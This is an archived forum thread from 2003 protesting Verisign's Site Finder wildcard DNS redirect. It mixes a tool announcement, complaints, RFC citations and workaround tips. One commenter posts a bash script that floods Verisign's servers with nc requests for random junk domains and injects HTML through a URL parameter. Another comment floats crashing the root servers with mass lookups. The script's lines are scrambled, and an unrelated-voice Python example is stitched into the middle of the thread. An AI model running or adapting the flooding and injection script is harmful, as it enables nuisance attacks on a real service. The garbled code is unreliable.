Verisign Typosquatter Explorer
jelyon quotes Seth Finkelstein's website: "I have written a program "Verisign Typosquatter Explorer" in order to examine [the Verisign] suggestions [for mistyped domains]. Future data may be analyzed as interest permits.
Note tests with some domains seem to return results which are not constant, i.e. differences when the program is run repeatedly. This is not a program bug. Reloading the Verisign page also changes which squat-suggested domains are displayed. I don't believe it's an advertising rotation, but the behavior is similar to that practice."
it's amazing anybody is able to accomplish anything.
Anybody else feel like you just want to start over, with only good people involved, and remake the internet? None of this patent crap, none of this copyright bullshit, just pure standards that are actual standards. Uncompromised and pure. No restrictions on data, short of the physical line speeds.
Yeah yeah, I know..."when you wish, upon a star"
Mod me down with all of your hatred and your journey towards the dark side will be complete!
But does it matter? What Verisign is doing is wrong. Exactly how they're wrong is irrelevant.
"I don't believe it's an advertising rotation..."
It's a feature!
Two fish swim into a wall, one turns to the other and says, "Dam".
Everyone goto http://verisignneedstogetaclue.com
Don't forget to sign the petition on Verisign's abuse of the DNS system.
by Seth Finkelstein
Introduction
On Monday September 15 2003, a change to
When a URL has a misspelled domain name, Verisign's changes have the effect of redirecting every single HTTP page request (technically, HTTP response code 302). There is a redirection header and page which displays:
The document has moved here.
So, for example, the URL
http://verisign-is-to.net/more/evil/than/satan/
Gets redirected to:
http://sitefinder.verisign.com/lpc?url=verisign
This site suggests corrections to the typo. I have written a program "Verisign Typosquatter Explorer" in order to examine these suggestions. Future data may be analyzed as interest permits.
Note tests with some domains seem to return results which are not constant, i.e. differences when the program is run repeatedly. This is not a program bug. Reloading the Verisign page also changes which squat-suggested domains are displayed. I don't believe it's an advertising rotation, but the behavior is similar to that practice.
Support
This project was not supported by anyone. If anyone is providing financial support for such projects, the author would dearly like to know.
Version 1.2 September 17 2003
See also: Domain Investigations
Mail comments to: Seth Finkelstein
For future information: subscribe to Seth Finkelstein's Infothought list or read the Infothought blog
See more of Seth Finkelstein's Anticensorware Investigations
I mailed this little lot earlier today:
authenticode-support@verisign.com, billing@verisign.com, channel-partners@verisign.com, clientpki@verisign.com, consultingsolutions@verisign.com, dbms-support@verisign.com, dcpolicy@verisign.com, digitalbranding@verisign.com, dnssales@verisign.com, enterprise-pkisupport@verisign.com, enterprise-sslsupport@verisign.com, info@verisign-grs.com, internetsales@verisign.com, IR@verisign.com, jobs@verisign.com, mss@verisign.com, objectsigning-support@verisign.com, paymentsales@verisign.com, practices@verisign.com, premiersupport@networksolutions.com, press@verisign.com, privacy@networksolutions.com, renewal@verisign.com, support@verisign.com, verisales@verisign.com, vps-support@verisign.com, vts-csrgroup@verisign.com, vts-mktginfo@verisign.com, webhelp@verisign.com, websitesales@verisign.com, websitesupport@verisign.com
And I got a bunch of replies back, including *gasp* two written by actual human beings!
Remember folks, if you're going to write and complain, try and keep it civil. The poor bugger who has to read your complaint isn't the same person who actually took the decision to introduce sitefinder!
A little planning goes a long way...
So what do you do when you WANT to get a "domain cannot be found" error for troubleshooting purposes... I know it sounds weird, but this whole thing is very annoying.
R-
Hard loop..... huh?
Dynamic Designs
If I make a typo for "slashdot" such as salhsdtot.com it suggests goatse.cx as a top candidate. That's some pretty smart AI VeriSign has.
Trolling is a art,
I cannot get to 64.94.110.11.
Either it is not responding, or our network is blocking it.
Here is a mirror of the site in case it goes down: http://www.madcowworld.com/sethf.com/domains/verisquat/
Hey, I'm outraged and mad too, like all of you.. but, I'm not seeing this. Maybe my ISPs have taken a stand with their DNS, but both my work and home ISPs? Unlikely. Why aren't I seeing this?
# Erik
I'll be back, motherfuckers.
I bet Michael Sims was DDOSing me.
I'm not Seth Finkelstein. I still speak the truth.
How is this any different from me buying misspelled domains to profit off other companies' trademarks? I know the Federal Government just tossed a guy in jail for doing the same thing. There is something that stinks to high heaven about this. It looks like they are abusing their right to manage the USA TLDs along with violating RFCs.
Strange women lying in ponds distributing swords is no basis for a system of government.
If a large number of /.ers were to run a short script that tried to resolve random nonexistent domains, how long would it be before the root servers crashed?
/.ing the root servers.
Don't forget, YOU would not have done anything but asked your ISP's DNS for info. IT will be the one
Not that I suggest you do this.
The latest Slashdot meme.
What is newsworthy about this? This doesn't provide any statistics by itself. There are no wrapper scripts to actually match anything. All this does is parse the response page to display suggested hits. It's not even written that well.
It prints the suggested URLs out and then what? This isn't an explorer, it's a shitty data dump.
Besides, I thought Michael hated Seth. How did this story get posted?
Dacels Jewelers can't be trusted.
Petitions are pathetic per se, but e-mail/web petitions carry absolutely no weight at all.
I've worked for professional politicians. The web/e-mail opinion is irrelevant. If you want to be counted (not heard, mind you) send a letter or a fax.
BOO! TERRO
What sort of monetary damages is this action by Verisign incurring for people and businesses everywhere?
Verisign's action was most probably intended for web traffic, where it's at least an annoyance. But since the DNS is an independent system from the web that's used by all sorts of services, it's undoubtedly breaking all sorts of non-web things out there that rely on knowing accurately if a domain name exists... not to mention all of the additional maintenance time. Email and spam filters are the two that seem to've been brought up a lot.
So far I've seen a lot of people getting mad and I am too, but I haven't seen anyone actually state how much they're losing due to the sudden change and breaking of standards by Verisign. Is anyone confident to put an amount on this?
404 errors are generated by webservers. Your browser would return a "this page could not be found/resolved" page before this was changed.
This is news? Good god. I wish we could mod whole stories down... ;-(
-- I am. Therefore, I think!
Seriously, would it be possible for ISPs to file a class action suit? I have spent ALL day (so far) dealing with the repercussions of this blatant misuse of authority. I know others out there are dealing with the same. I also had two customers get .ws websites rather than AVAILABLE .com sites because they use the method of putting the name in the browser and seeing if a site comes up. They figured Verisign was squatting on the domain, and thought they would have to pay Verisign for the use of the domain.
On a side note...
Our mail servers are filling up with spam, and with the recent loss of SPEWS, our spam filtering system is basically useless.. save for the few other blacklist sites still out there. Spammers must be rejoicing today.
Fuck you VeriSign, Fuck you very much.
Everyone is entitled to their own opinion. It's just that yours is stupid.
Well, this is finally working for me now!
Man, did you check out their "terms of service"? That shit is hilarious!
"14. By using the service(s) provided by VeriSign under these Terms of Use, you acknowledge that you have read and agree to be bound by all terms and conditions here in and documents incorporated by reference."
HOW THE FUCK AM I SUPPOSED TO READ AND AGREE TO BE BOUND TO TERMS, when I arrived at the site by mis-typing a domain name????
From the privacy policy:
"Under no circumstances do we collect any personal data revealing racial or ethnic origin, political opinions, religious or philosophical beliefs, trade union membership, health, or sex life."
No? What about when I go to any political site, sex site, health site, religious site, etc, and don't type the domain name correctly?
http://www.sitefinderreallyreallysucks.com/
Because sitefinder-idn.verisign.com runs Linux, and now 99.99999999% of all domains now point to it, almost 100% of the Internet is now running Linux!
Verisign was contracted to run DNS servers for the .com and .net top-level domains; both of which are in practice "flat" address spaces, with no formalised lower-level hierarchy. If an organisation registers the domain "foo.com", implements nameservers for this domain, and then these nameservers ignore accepted practice and the way the majority of Internet applications expect the nameservice to work - then the organisation shoots only itself in the foot.
Verisign is in effect treating the entire top-level .com and .net domains as its corporate property.
If Verisign were genuinely ignorant of the effects of their move, then the company is not competent to operate TLD DNS services. If Verisign were aware of the potential problems their decision could cause and went ahead regardless for commercial reasons then the company is not fit to operate TLD DNS services.
If ICANN cannot react to this nonsense in less than a working week, ICANN itself is not fit to direct the Internet naming service.
Apart from massed armies of geeks with pitchforks and flaming torches converging on Verisign and ICANN locations, does anyone have any constructive suggestions on how to get the parasites out of the loop?
If you think their servers are going to suffer under a slashdotting if they are now accepting ALL mistyped/obsolete domain names, think again. The slashdot traffic will be totally insignificant.
Does anyone have any idea how an application (or even resolver) writer could work around this?
All the solutions I've come up with can be defeated by having verisign rotate their IP addresses or domain (sitefinder.verisign.com)
What is BIND doing?
Martin Brooks / Slayer99 #linux / UIN 2178117
It seems to work maybe 1 in 5 times. They pretty clearly did some serious underestimation of the server resources they'd need to pull off this kind of thing, so now they are effectively DOS'ing Web clients by holding them up while their server chokes.
Incorrect. Domain change propagation still takes up to 48 hours, even when it's Verisign doing it.
This change is on the root servers. They serve the .com/net/org subdomains, period. Whether you're in Canada or Antarctica, it doesn't matter. Some ISPs will have the new wildcard record, some will not. Give it a day or two, and everyone's caches will have expired and will have the latest info. Then you'll get to see it.
Random and weird software I've written.
I wrote an email today to NetSol/VeriSign to voice my displeasure. As I have 5 or so domains up for renewal in October, along with various web and email hosting features that go along with them that are currently with NetSol. I told them that I would be moving everything to another registrar should they not have rescinded their change by my renewal date.
I know that my $300 a year may not be the end of the world to them, but I thought it important that they know that some people will make buying decisions based on this. And the types of people that handle DNS registration issues are just the types of people to be ticked off by this.
They sent me a form letter response, that addressed both this new unregistered DNS feature as well as the "register in advance for about-to-expire domains" feature that I didn't mention at all in my email. Their response to that issue was also defensive, so I take it that they're getting an earful on that one as well.
-Lucas
Marketing fools don't read web server logs.
You have never actually worked at a company have you? You do realize that people make millions of dollars a year writing web server log analyzers and correlators for marketing research. Don't take my word for it though.
Single quotes are your friend. Anyone who types \& is a dumbass.
Really, how do you propose to pass a reference to a subroutine? Oh, you mean in shell syntax? Why do single quotes when you can just escape. Escaping is a pretty handy thing.
You're a dumbass.
You need some help, mate. Seriously. Get a cat or something.
Dacels Jewelers can't be trusted.
Official response is here
Essentially, they state that this change violates the RFC for DNS for several reasons. They are creating an IETF working group to recommend practices for implementing DNS, above and beyond what the RFC requires. Unfortunately, there is no mention of any action, or even censure.
Here
Somewhat off-topic, but relevant to the whole Verisign DNS idiocy... I have thrown up a database of patched nameservers here (don't worry about arouse.net, it's not a porn site), which currently allows you to check to see if a nameserver has been patched to block return of 'A' results for non-existent domains, and allows you to add to the database if it is a patched server.
OK, how about this one:
3 25 0
http://slashdot.org/article.pl?sid=03/09/16/192
It was only yesterday -- the Senate voted to roll back the FCC media consolidation ruling, based to some extent on the MoveOn petition. Check out the picture of Trent Lott standing next to 360,000 pieces of paper. One of those is mine, and it looks like it carried some weight to me.
I went to school with Eli Pariser, btw -- he's one of the guys who runs MoveOn. Check out what else they've done to see how online activism can be effective.
Spam filters could filter out "forged" email by verifying if the from address' domain actually resolved. Every address now resolves. Programs which check whether or not a web address is "up and working" can now be fooled into thinking it is up when it is not. There are hundreds of similar programs or software running in organizations that expect clear and consistent error information.
This bypasses my choice of search engine within my browser for nonexistent domains (currently google).
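An added example, not code from any poster in this thread: one way an application can answer the earlier "how could an application work around this?" question and restore the sender-domain check described above, by probing each TLD with random labels at run time instead of hard-coding the Site Finder address. The function names, the fake resolver and all addresses other than 64.94.110.11 are constructed for the illustration.

```python
import secrets
import socket

def system_resolve(name):
    """A records via the system resolver; [] when the name does not resolve."""
    try:
        return socket.gethostbyname_ex(name)[2]
    except OSError:
        return []

def wildcard_addresses(tld, resolve, probes=4):
    """Resolve random labels that are (almost certainly) unregistered.
    Whatever they return is wildcard data. Taking the union over several
    probes covers a registry that rotates among a pool of addresses."""
    seen = set()
    for _ in range(probes):
        seen |= set(resolve(f"{secrets.token_hex(12)}.{tld}"))
    return seen

def domain_exists(domain, resolve, cache):
    """True only if `domain` has an address that is not a wildcard address."""
    tld = domain.rsplit(".", 1)[-1]
    if tld not in cache:                      # probe each TLD once, then reuse
        cache[tld] = wildcard_addresses(tld, resolve)
    return bool(set(resolve(domain)) - cache[tld])

def sender_domain_resolves(from_addr, resolve, cache):
    """The spam-filter check: does the From: domain really exist?"""
    return domain_exists(from_addr.rsplit("@", 1)[-1].lower(), resolve, cache)

def make_fake_resolver():
    """Constructed stand-in for DNS so the example runs offline."""
    registered = {"example.com": ["192.0.2.20"], "slashdot.org": ["192.0.2.10"]}
    # 64.94.110.11 is the address named in the thread; the second is constructed
    pool = ["64.94.110.11", "198.51.100.7"]
    count = [0]
    def resolve(name):
        if name in registered:
            return registered[name]
        if name.endswith((".com", ".net")):   # wildcard zones
            count[0] += 1
            return [pool[count[0] % len(pool)]]
        return []                             # NXDOMAIN elsewhere
    return resolve

if __name__ == "__main__":
    resolve, cache = make_fake_resolver(), {}
    for name in ("example.com", "salhsdtot.com", "slashdot.org", "nosuch.org"):
        print(name, domain_exists(name, resolve, cache))
    print(sender_domain_resolves("someone@forged-sender.net", resolve, cache))
```

Pass `system_resolve` in place of the fake resolver for live lookups, and expire the cache periodically, since a pool that changes after the probe was taken would otherwise slip through.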
Dude, that don't fix the apps, which is the main problem that the dumb cunts at VerShit didn't think about. Now all my programs can't figure out that the entered address is not at ip 216.168.224.63 or 64.94.110.11. So instead it tries those Ip's and has to time out. Hopefully their servers are getting flooded the fuck out but I guess one really needs to write a proper app to cause any serious damage that may get them to change their minds.
GPLv2: I want my rights, I want my phone call! DRM: What use is a phone call, if you are unable to speak?
#!/bin/bash
/${fakedom} HTTP/1.1
/lpc?url='%3E%3Cfont%20size=+5%20color=%23FF0000%3 E\
#
#Replace dumbwordlist if you like with nonsense
#that will be used to fill up Verisign's database
#with useless crap.
#To make it eviler, remove the $((RANDOM%10)) parts,
#or maybe wrap the inner loops with an outer loop that
#picks a random postfix and asks for all of the
#domains ending, with that prefix, 10 times or so.
#Since the stuff should get asked for repeatedly,
#maybe they'll get "false positives".
#
#Also note that this simulates the first request to
#the siteverifier page, which sends a redirect to the
#real page with the ads and links on it. We ignore it
#and send the second request, knowing full well what
#the first one looked like. Hopefully this "seems"
#legitimate on their end.
#
#Your ISP may have already null-routed 64.94.110.11;
#if so this script will hang with no output.
#To remedy, remove the first nc command (up to the first
# %%EOF%%). Leave the second one, as it appears
#that one is still visible. If both are invisible, your
#ISP has _really_ gone the distance to piss of Verisign
#
#Kudos!
dumbwordlist="rem0te br4nd sar1n flau7a mickst3r robbi3 ch3my jjopppl fuckkksl ncmaster df753 klopuier beeiosla cuntwh4ccker openinsertcl oofignet phaconspal qrrtioe sumnsan rx30sony popopospospposp llqksjajjq0 aslashji aklhjk3421 halff liveees ttooowo toowoo aslllkoq"
for each in $dumbwordlist;
do
for eachi in $dumbwordlist;
do fakedom=$each$((RANDOM%10))$eachi$((RANDOM%10));
nc 64.94.110.11 80 <<%%EOF%%
GET
Host: ${fakedom}.com
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
%%EOF%%
nc 12.158.80.10 80 <<%%EOF%%
GET
VERISIGN%20SUCKS%20MY%20${fakedom}%3C/font%3E HTTP/1.1
Host: sitefinder.verisign.com
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
%%EOF%%
done
done
Fuck Beta. Fuck Dice
And it depends on the content as well as the medium. My fax was original, business-like, and carefully-argued, though partly based on stuff available online. I suspect that originality, literacy, clarity, conciseness, and focus all count well, just as obvious copying, rambling, pointless emotion, length, and lack of focus will make a communication less likely to be read or acted upon. You need to state carefully but briefly the problem, the cause, what you're asking your representative to do, and why; if you do that politely, it'd be an inconsiderate person who didn't at least reply, whatever the medium.
I suspect that the reason online petitions often don't seem to count is less that they're online, and more that they're petitions; without a direct, personal request for action, any communication will have less weight.
Ceterum censeo subscriptionem esse delendam.
Except that, if a domain name has no MX, the A record is used instead.
Quoteth chapter & verse (RFC 2821, section 5):
"If no MX records are found, but an A RR is found, the A RR is treated as if it was associated with an implicit MX RR, with a preference of 0, pointing to that host."
So, any mail to a non-existent domain will be (attempted to be) delivered to 64.94.110.10, which helpfully has "Snubby Mail Rejector Daemon" running on port 25.
Check it out...
BIND delegation-only patch:
From the verisign-grs.com WHOIS:
Administrative Contract:
VERISIGN GLOBAL REGISTRY SERVICES rcc@verisign.com
21345 Ridgetop Circle
Dulles, VA 20166
US
703-742-0400 fax: 703-421-6703
Dunno how correct it is...god forbid that Verisign should put incorrect info in the whois database.